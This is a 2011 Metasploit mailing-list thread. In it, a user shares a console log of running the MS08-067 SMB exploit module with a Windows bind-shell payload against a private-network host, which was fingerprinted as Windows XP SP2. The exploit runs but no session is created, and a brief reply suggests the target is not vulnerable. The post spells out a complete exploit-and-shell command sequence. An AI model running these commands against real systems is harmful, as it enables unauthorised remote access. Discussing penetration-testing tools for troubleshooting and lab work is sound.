Metasploit mailing list archives

Re: ASK: Exploit completed, but no session was created


From: Sumit Sharma <sumit.iips () gmail com>
Date: Sat, 12 Mar 2011 23:05:08 +0800

Target might be not be vulnerable.


On Sat, Mar 12, 2011 at 10:21 PM, Dodi Ara <dodi.ara () gmail com> wrote:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
RHOST => 192.168.1.11
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.11     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER,
SRVSVC)


Payload options (windows/shell_bind_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread,
none, process
  LPORT     4444             yes       The listen port
  RHOST     192.168.1.11     no        The target address


Exploit target:

  Id  Name
  --  ----
  0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

-------------------------
why metasploit doesn't succesfuly?
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: